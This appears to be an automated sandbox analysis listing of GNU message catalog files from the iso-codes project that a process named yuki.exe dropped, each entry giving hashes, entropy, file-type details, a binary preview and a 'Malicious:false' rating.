                                                                                                    SHA1:762D916EF563B4568A9215F8CB24205B7C237075
                                                                                                    SHA-256:5C304B8505512F84204DDA3B12003E97441404B0287E34F87430CC8DCEA7F9A3
                                                                                                    SHA-512:80A11A4FC4B68FC0931A9EFA5E50CDF2B7BA855052C8540D70EAF2BD51F3A70697FB92FF69A28F1C04B3520CA993491316647A5363C44BBF9DDD89B4A13272F2
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2617 messages, Project-Id-Version: iso_639-3 'a-pucikwar'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121821
                                                                                                    Entropy (8bit):5.219858213421718
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:X6rLHEEss3HK/WfwJLnWnG1cbGO4fw6VyTOsmSr4W/A0Qn1F:KXHKuwJsR5gy4W/A0Qn1F
                                                                                                    MD5:5497C2658C895B4AA9F6F44D7751CD8C
                                                                                                    SHA1:6FFC2F6234426DB16FB8802746FDD3C60C141676
                                                                                                    SHA-256:D78EBB39896773D9DF3731CE585EB28A36993F4603D9A96C9DA00CE6C470C3A6
                                                                                                    SHA-512:8118F250F7BB6B10E0348B8038A5994451ED39FBA00A49E634FA0B2D20FFBE4955212AC9742EE06876C1B1BB0FC366ACA2C59FCDA0547641678EC8B688347162
                                                                                                    Malicious:false
                                                                                                    Preview:........9........Q..............8.......9.......D.......J.......O.......U.......].......g.......t.......y.......~.......................................................................................................................................................................%.......-.......5.......<.......E.......N.......W......._.......h.......m.......w.......|.......................................................................................................3.......B.......Q.......W.......g.......................................................................................................................................3.......;.......?.......D.......Q.......Y.......q...............................................................................................................#.......).......1.......>.......E.......P.......U.......j.......p.......x...............................................................................%.......4.......I.......Z.......r...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'j\304\231zyki afroazjatyckie'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7985
                                                                                                    Entropy (8bit):5.055735091542171
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2sJhw38iPPjRSlSE0BfCuXr5VcJHVC/xGXwZgPW+4olyhuLAinwbZ:4SDx2JI8iuSE0BfNca5sFsh6ARbpsts
                                                                                                    MD5:E40E0FF650E4772188C3786D98F3E42F
                                                                                                    SHA1:F7B8A14C76E5711403CC29AFFCDA4C66010FE22F
                                                                                                    SHA-256:A54724D34304EF2ED4F30C1ED83D2D000183A1F3372F998657D7CEA0F282A856
                                                                                                    SHA-512:C5BBA097797F358EDBE647D61CF0C30B93650D24D76860574E7BDBF8F345395B031A52CA791EB4DBCEDA5F90E6FEB1C061D93A19707B822C9762A928B39EE89C
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................=...........R.......i.......z...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 147 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7217
                                                                                                    Entropy (8bit):5.051316768458637
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:moinbQJg7YJWYKp5acinqzaePXc9WYF4da1V75xy0gxV+19lDXCjTWyHBEd:m5sg7ZjR9mscUYF4daVMc9BS3WyHBEd
                                                                                                    MD5:366A0D6CD41FD47C230233714F89B220
                                                                                                    SHA1:029FAC71670ED583EC1D5EF4A6776646D125BBE1
                                                                                                    SHA-256:C4FC3836A209A8AC53200A763AE28077F71AE4D31F67868D904883FE7633A076
                                                                                                    SHA-512:BA7C897323C3C55DACC775C3F3B7406E87EF8694D7FC896C3E80A6AFEBB42550B7AE3ED8B872B34A9FF4D845FE776FA048CF5A290D45373A11D2AF4BB1EAC566
                                                                                                    Malicious:false
                                                                                                    Preview:........................L.......`.......a.......m.......u.......}...............................................................................................................................................................'.......4.......<.......E.......N.......U.......n.......s.......y.......................................................................................................................................................#.......).......0.......8.......B.......I.......P.......V......._.......i.......q.......y.......................................................................................................................................................................$.......)......./.......:.......D.......L.......U.......`.......h.......s.......{...............................................................................................................................................-.......5.......<.......H.......N.......Y.......f.......n.......y...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):392
                                                                                                    Entropy (8bit):5.194422955126935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilij2EYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AFeH+qsXmBQ8KMW0YEi9:i45xxjt02UkLKcG/Ki4FLeeqsXmBQWi9
                                                                                                    MD5:E6C23473919C49E446C99672EA6D3919
                                                                                                    SHA1:4D9FD55E77FC60CD347BB758F3B5212294A40014
                                                                                                    SHA-256:7AB83B8EF370FB5EA17B4F999DC1902C84F1F443B6CBF42A1157131B72F16736
                                                                                                    SHA-512:533EA4ABF70BE75D1DB1CF500B7F1DDF26BE22131F64BAA6028B22EF35A96118D526803DED589D43235EED3E81CFDA098CF3846DA5EAD014339E8E008AC0166F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...N...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Pushto.Language: ps.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 30 messages, Project-Id-Version: iso_639-3 '\330\271\330\261\330\250\331\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1709
                                                                                                    Entropy (8bit):5.221140796832468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:eub7uEolNslb14o/cg8crbMUZI+p3h66H9jFXzfI:Tb6T2lb14p8MZ+p3VH9jJzfI
                                                                                                    MD5:9EDA3C598108259FD352073775D29C20
                                                                                                    SHA1:AD3CCFBF49B18C1492310D53BD20907C5D7B35BF
                                                                                                    SHA-256:D17C5DAA989974C781B51305171BA4C5F9CAE7D8699815B82528F611667D37CC
                                                                                                    SHA-512:340BBDA5773CC35573F6A971C770DD0E40C20267107F17716834F5B74F3F8B2B9C714FB443E3671C27BA07F257107B38525F68CB1F3B2653918E422899B20386
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...........................................................................................................................................................(.......-.......7.......?.......F.......Q.......Y.......b.......j.......p.......v.......~...............V......._.......j.......u.......~...............................................................................................................(.......3.......>.......K.......\.......e.......t........................................................................................................................................................................................................Arabic.Armenian.Baluchi.Chinese.English.Estonian.Finnish.French.German.Hebrew.Hindi.Italian.Japanese.Kurdish.Latin.Macedonian.Malagasy.Mali.Mongolian.Persian.Polish.Portuguese.Russian.Sanskrit.Swedish.Tajik.Tatar.Turkmen.Uzbek.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-code
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 170 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9583
                                                                                                    Entropy (8bit):5.068500299418882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:hA3+oCFr9Qfz3mRA467rVD5z0gu/36A1Xr7LrnH/:qxCfEWijVD5z0gu/36sX33nf
                                                                                                    MD5:4968DDEE9FA0FB9266728B5E75318187
                                                                                                    SHA1:FE6F6F6738FDCE0BA2D6D1B46DDE455F6216DE26
                                                                                                    SHA-256:2706135654379B14852779CCDABB5E50EF846B9DBC26DFB054113D0CBC4F4A6F
                                                                                                    SHA-512:16058A838B780C84A4D9B7A593A421E31BF733A855C961D4DA03B7E9DD3C8E5DD53B305B8EFA1DB5B7510F012A94DB57844C3F6D298D7CF8562468CF789220FC
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............H.......I.......O.......U...?...d....................................................................................................... .......).......0.......8.......A.......G.......N.......a.......h.......m.......v.......|...........................................................&...........B.......S...(...g............................................................................................... .......).......C.......\...,...v...................................................................&...........F...4...u...................................................................................................#...........R.......f...............................................................................................................................................5.......G.......f.......t...................(.......................................-...............!...+.......M.......T.......[...#...a...........".......)...................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 422 messages, Project-Id-Version: iso_3166-1 'Afeganist\303\243o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23926
                                                                                                    Entropy (8bit):5.0686869185368355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:q+dXrIPXz87/N02nz3l+TxCOZGPVPhjFbjh5wsWP4XWAIziVGaPFhl5LaCpmA7BS:rdLVJnz4TxHGPVPhJtmsWP4XWAIaPBhw
                                                                                                    MD5:40C3F3E924D435BC997B96C6CCA07772
                                                                                                    SHA1:95F3ED201CB9AF0EA50FAED257E3FE56DC70110A
                                                                                                    SHA-256:B8AD6A82040B85F28C7619C802C6BA7479EC33CF9F4E8232046190F188D2B664
                                                                                                    SHA-512:5332265CAB0A40A72B62D7931FE5D708B9EF016EA9DDE2676AFBEB0678028B42DDEDD28C66510A126DD77E09C968E2C182EDCDDA46D3FCE09CF56F60C3C55005
                                                                                                    Malicious:false
                                                                                                    Preview:................L...3...|.......H#......I#......U#......]#......e#......t#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$......%$.......$......6$......>$......E$......K$......S$.. ...Z$......{$.......$.. ....$.......$.......$.......$.......$.......$.......%....../%......A%......J%......W%......_%......j%......s%......|%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..,...#&......P&......X&..%...^&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....'.."...2'..*...U'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......3(..'...A(..$...i(.......(.......(.......(.......(.......).......)......$)......,)......3)......A)......R)......b)......~).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......(*....../*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territ\303\263rio Ant\303\241rctico Brit\303\242nico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2716
                                                                                                    Entropy (8bit):5.215108741870437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD5GRTMtiTKPvGqIfdvqNuoUS2wnasqQ1K9PjvsQfHvX:qD6+yBop9nVAP//vX
                                                                                                    MD5:B39C3FDEDA58AF7DC4F0D2682A0A1412
                                                                                                    SHA1:2858B6F40E119BB80CBA5A1B43B777F995F057B1
                                                                                                    SHA-256:C39A530C9F2D5CB558CB4DDACD38B8E674691E9286FAFF7C81B8B82A8EDE6837
                                                                                                    SHA-512:FD464AE9E1B98940740D382D1454D93414F469B11A98F17210713A533A87127E9E467C6E205026EAA0865F5AC7F6FFAE17E3A849BE3AB78F814F68C8ABC1666C
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..................."...O...)...r.../...............3................... .......5.......A.......W...'...v...#.......................................................7...'......._.......x...................,.......4...............#... .......D...8...N................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'Unidade de conta ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9110
                                                                                                    Entropy (8bit):4.957515593660907
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfmvwmZIVqMDdgjCnMLCkmRTxzv7V6:TIDmYme9Ddgmn2D0TJv7V6
                                                                                                    MD5:FFEF2559C1CF005913FA27E9ABC6F896
                                                                                                    SHA1:E86C13678E0C049ADBAD4CC4EF7F98841E4B3491
                                                                                                    SHA-256:6201CD9C69FCFEBC1D8B152692A8B6524C570FD3B7167B75E833859E8F145631
                                                                                                    SHA-512:93105127EF6CC710AE1D32F3EC487D78E0418A63B7C8999E6A84E4A5CC9A624FC4DF9026B3E4DA9DE08B310C677DFBC389B7001E0A83AAFAFB245F1FB598F58F
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 369 messages, Project-Id-Version: iso_639-3 'abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15062
                                                                                                    Entropy (8bit):4.756833161638407
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:DDuq8Y5/WaOxSY1/uPYZFMGpEfSA5j1XBTK9IW:DDuHYEqju9V
                                                                                                    MD5:FE4C24514FF841682A6B682DC9A2F5A2
                                                                                                    SHA1:94096D2DDC32F14C6CA309280B64A1C71A58D6E6
                                                                                                    SHA-256:E7A033952C0A977118F4B7A33CD84DC55257D95B07957FD91823EC7BE8CEDDE0
                                                                                                    SHA-512:B3B7AF4B367DFD427B7C4829A85FFD4EDC03C1D0AAD91570D554E419D4263A3AD5C0451517730668F46B15F609228D5208757BF4BEC850ECD082DD03AF16463C
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,...............................................................(.......2.......7.......<.......E.......N.......d.......j.......r.......y........................................................................................................................ ....... ....... ....... ....... ......' ......3 ......; ......D ......J ......R ......Z ......f ......k ......r ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!....../!......=!......D!......L!......U!......Z!......`!......n!......w!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......)"....../"......9"......B"......F"......M"......S"......["......b"......j"......n"......u"......~"......."......."......."......."......."......."......."..#....".......".......".......#.......#.......#......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10363
                                                                                                    Entropy (8bit):5.080362981842153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dQV80THghBgXzltU4WjV9qWxa5hW8WH/3BE13XjQD/k:C+0rjzg4WjVDxa5hW80/3BA38bk
                                                                                                    MD5:C04EBC0851AD52DD6A64D9AC00FE939D
                                                                                                    SHA1:30B459E575196FE9EDBB50FE7D5671CE03D2032F
                                                                                                    SHA-256:F0F6C4A10711BC88E01C7A1F416D3486774332EC265996184CD02CB14E7419CF
                                                                                                    SHA-512:A30BACE449D4E1990BD883470358A7697FD52D5D3F66F40356794B914C315C8792C20CA65038F2D5CA60D8C3694C093D91B19207F94A74D7D4D435EC91632603
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 'Afeganist\303\243o'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24079
                                                                                                    Entropy (8bit):5.071022406882597
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:taDYOckDRD2S9/P962mKR4DpQqYbEbjh5wsWP4XWAINiVGdDPBCCGl2cMp/AUy3T:naD2Sl9lZ2pMbgtmsWP4XWAInDPBCN2o
                                                                                                    MD5:5CD8FC735C8B9EFC74C3E59A16915026
                                                                                                    SHA1:D867169C040BFF3FFDE2953FEFB0819D03944EEF
                                                                                                    SHA-256:3766494865E7A3B5FA15758F748B80C25AD8DE88149F016AE79F7BD9AC352506
                                                                                                    SHA-512:059576A0630956C3EDA770F3DF62AFFDB3ABB168D46A334DE7A0E0512F53797A6C7085501FBB0CDA215EEFB87204C010464DB9B568036DA514B6779B9C38E951
                                                                                                    Malicious:false
                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9 messages, Project-Id-Version: iso_3166-2 'Bol\303\255var'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):858
                                                                                                    Entropy (8bit):5.252204495198591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+GpuWy/jXZaE+ALSt0Uh2DUr/utXmGrbnrCwW:vpuXXZaE/L/UwwGou7rCwW
                                                                                                    MD5:8245E90DC59A6F7FB442D0FEDF3F7606
                                                                                                    SHA1:C4F90A462348C60BC44940ED564855DBD11546EC
                                                                                                    SHA-256:EEA595FE73173F60F300B5B8CA17DD2F5860BB3CB0CD0BE8634416B33B3A8382
                                                                                                    SHA-512:80F0A39D1E6BA43B6ED31C07057BDDAB402A0B8048B5441AD547FF6CE5F5D7609EC028CE7F97C6814CF296BFA0D8BD1C3DB0B2B7CFEB0B90F5E24597B079F8A0
                                                                                                    Malicious:false
                                                                                                    Preview:................d...............................................................................!.......-.......................#.......+.......6.......C.......J.......P........................................................Bol.var.Elbasan.Lempira.Luxembourg.Midway Islands.Sikkim.Sucre.Wake Island.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-12-23 17:30+0000.Last-Translator: Rafael Fontenelle <rafaelff@gnome.org>.Language-Team: Portuguese (Brazil) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/pt_BR/>.Language: pt_BR.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.4.1-dev..Bol.var.Elbasan.Lempira.Luxemburgo.Ilhas Midway.Siquim.Sucre.Ilha Wake.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territ\303\263rio Brit\303\242nico da Ant\303\241rtida'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2874
                                                                                                    Entropy (8bit):5.231206002689247
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3LSy6ko+vGqIfdvqN5CoUX8vavvesO61PKSPfFFfWu:rLvEko+yaCoPvavvBVKSPNFfn
                                                                                                    MD5:FF6D33023E44A898E0054F95B459B58F
                                                                                                    SHA1:F83AB5BFDEA7D97E62BA4A953939405E97EE84C2
                                                                                                    SHA-256:0C2A56777EB7E49D2264345E85ADD6A6C323A8C6FC85B6A5CD53B0167DF26A8F
                                                                                                    SHA-512:DCEFE66018F1EB19FA115BE9715B2C9A1AD5D56090E0A390F290DA9171A858F5A4D49AC5C5E03D186ECF22A312CD818D4639D16B204482B0854E4592C9A72A47
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................$.......,.......1...(.......Z...8...s...................................&.......'...........9.......X.......o.......}........................... .......................................#... ...4...D.......y...+...............*.......0...........%........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'Unidade de conta ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9032
                                                                                                    Entropy (8bit):4.970389442085518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TIQmjyYSfFkZVmBmUgyzPA8gkRz2FongBkaTZbtqJVpkS2SILCqKmTFDof52l4Ve:TItbtfmJgyskCwdgjCnMLCk81zM
                                                                                                    MD5:0C002D9F83E1447FD149E03E69913792
                                                                                                    SHA1:05FF7863CB90A9ECA1417ECFA6E2A7995FF90DA2
                                                                                                    SHA-256:E2391F60243B97B83628E61E8736F2EA05F98597399E4E5C3F718F96DCF88FFE
                                                                                                    SHA-512:7455B3EAB42864C1D660ECE6346A67E22393FF745F20A9F723204B7460E2302290027ABCCB788D6621D5A24228E2B71E35E8EDB97891F095CB852DF7B9571699
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 434 messages, Project-Id-Version: iso_639-3 'Abc\303\241zio'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17829
                                                                                                    Entropy (8bit):4.8198723175115505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:iW+p3mlGp3xRITHO/aQycyiGDfR+/urXINflxSlDIMFM3JK3h4rKX4G8LYyHyp:iWugFrzOlxS72+kvc
                                                                                                    MD5:D1A7E357D96F66B1ADC9E030DB9F4022
                                                                                                    SHA1:D2B60516C814731FD0E0A24C79E5A13DD8613CF7
                                                                                                    SHA-256:C19112B286398B3AE2C92B0703EA967661B07AF1EEF80FD80261494919F2C8DD
                                                                                                    SHA-512:2AE506807C96C9D3675D1A74802BB2E999EF22EDA1562E980AEFEF14C00730541394C57E7069B98444A24C7520F3D9E1078C7DD5ABA8EBE3A18EF4FC99952ACE
                                                                                                    Malicious:false
                                                                                                    Preview:....................K...<.......h$......i$......s$......|$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......$%......+%......2%......>%......G%......O%......W%......^%......f%......m%......s%......x%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......!&......)&......9&......I&......R&......Y&......b&......j&......s&......|&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'...... '......&'......-'......4'......;'......?'......H'......N'......U'......Z'......`'......f'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(......%(......)(......0(......6(......>(......E(......M(......Q(......X(......w(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Idiomas afro-asi\303\241ticas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7751
                                                                                                    Entropy (8bit):4.85659434819192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi207xE86wCYXRSlSE0BfCuXr5VcJHVC/w89DHiEBARjRkducbVbTbL:4SDxm7EW6SE0BfNca/NhARjRRobuo
                                                                                                    MD5:BC58F137ED8D520F10AD9BF0C0002CD7
                                                                                                    SHA1:B3C496FCAFB17706374F6A58EF6631B589A87310
                                                                                                    SHA-256:F6BBEF1F5BFCB29A8017FFD1FD62DFDE02EA4D2DB38D0FCC32B599B24D864E6D
                                                                                                    SHA-512:9E5A497DA033EBE0A5CA5D269D2466B7BC09428D2897B946DB6342E0C4CB118B2F7E3D480CEF01D864A809737360515A14B4B1557370B68056AE9D3BE0759CE7
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................#.......5.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10632
                                                                                                    Entropy (8bit):5.055570997308311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dKriTgX5AqJltU4WjV9qWxa5hW82TngFl1ps0h1do9Qf3UQxr7DK:+2Og4WjVDxa5hW8KgF7ps0Xdo9Q/U8K
                                                                                                    MD5:70703DED55F1C689560DBF60320ABF09
                                                                                                    SHA1:1DB8225E613E1E5F362EB9DD8E489F420747F8F7
                                                                                                    SHA-256:D616F9E1C4E5F00AFB5C9E8DB11ABE235441EBAAC5A5B43F68507F23297BA249
                                                                                                    SHA-512:FED3E7D16D62C252A16EF9C1EAB8E329C7050F035050428D6F99DC1DC8C492F02E543C114499C6C016C69E3D72784766FF13CBA8F9BA67FA31FAFB0466B1B659
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23486
                                                                                                    Entropy (8bit):5.004401305231662
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosR8fPjmVRVvwE346nbjz5wsWP48WAINiZGynpwvmz6msDApvRJuD6OyN:0oI8fIfvwO48fmsWP48WAIAn6vmz6VD8
                                                                                                    MD5:106BAFEEF85315FCE3E4DC2094F7E4A9
                                                                                                    SHA1:AA1FD3DA095A42999815EC340228991A7EFF2FEF
                                                                                                    SHA-256:F5A74BE33387DD48FE53F5F371F05F132867857A6DB774219D4283CE24D42EFA
                                                                                                    SHA-512:17C7A13DBA9B5EF056A3ED6B2F3C3C49D037D23326FD2593282DE80861F556F0CFB2379C8F72DFA07A28697DB5699BEDF2B3209EB3E8AECC1866FF3DF1CB4B8A
                                                                                                    Malicious:false
